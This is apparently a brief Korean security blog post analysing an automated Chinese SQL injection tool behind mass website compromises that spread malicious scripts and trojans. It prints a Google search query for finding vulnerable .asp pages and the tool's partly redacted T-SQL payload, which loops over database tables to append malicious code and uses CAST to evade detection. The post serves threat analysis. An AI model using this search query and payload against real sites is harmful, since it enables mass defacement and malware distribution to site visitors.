최근의 다량의 웹 페이지가 중국의 SQL Injection 공격으로 악성 스크립트와 트로이목마 등의 배포에 사용되고 있다.
특히 자동화된 공격으로 인하여 많은 사이트가 다량의 피해를 입고 있다는 점에서 주목해야 할 부분이다.
초창기에 이슈가 되었던 fuckjp.js 가 기본설정으로 포함되어 있다.
물론 최근에는 변형되어 다수 사용되어 지고 있다.
이 SQL Injection 툴은 ATI(AMD) 프로그램 아이콘을 사용하는 것이 특이하며, Form Caption 을 CLI 로 사용하였다.
Embedded Web Browser (http://bsalsa.com) 를 사용하며, Google 에서 inurl:".asp" inurl:"b=" 과 같은 쿼리를 이용하여 취약한 사이트를 찾게 된다.
http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&as_qdr=all&q=inurl%3A%22.asp%22+inurl%3A%22c%3D%22&btnG=Search
아래와 같은 공격을 시도하게 된다.
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select .name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and <일부제거> FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<악성코드>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor ;DECLARE%20@S%20NVARCHAR 4000);SET%20@S=CAST(%20AS%20NVARCHAR(4000));EXEC(@S);--
Obfuscate Attack 을 하기 위해서 CAST 구문을 이용하여 탐지를 회피하는데 사용한다.
Joe Stewart 가 분석한 SQL Injection Attak Tool 은 Win32 console 로 제작되어 있다.
http://www.secureworks.com/research/threats/danmecasprox/
http://www.virustotal.com/analisis/d7d5aa4b4b6e56e060b695f986f709a4
TAG sql injection
